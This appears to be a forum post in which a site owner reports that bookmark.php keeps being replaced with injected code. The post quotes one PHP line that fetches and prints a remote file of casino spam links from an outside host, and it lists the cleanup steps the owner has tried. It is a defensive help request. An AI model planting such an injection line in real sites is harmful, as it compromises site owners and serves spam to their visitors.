bookmark.php exploit
-
My site has been hacked and after I clean it up it comes back after a week or so. The exploit replaces bookmark.php with a new one that appends a script that begins
function encoded_optimal(){print file_get_contents(‘https://nadoelo.cn/baza2/21.txt’);}…
The file that is loaded contains hundreds of links to casino sites, and this causes all my Adsense ads to be casino ads. There may be other things it is doing but this is the most obvious.I have not seen other references to this exploit, although if you google “nadoelo.cn” you will see dozens (maybe hundreds) of blogs where this script returns an error. So it must be very common. How to get rid of it once and for all. I have uploaded clean new everything, including plugins, checked db with Exploit Scanner, changed ftp password. Today I am trying removing write permission on bookmark.php.
- The topic ‘bookmark.php exploit’ is closed to new replies.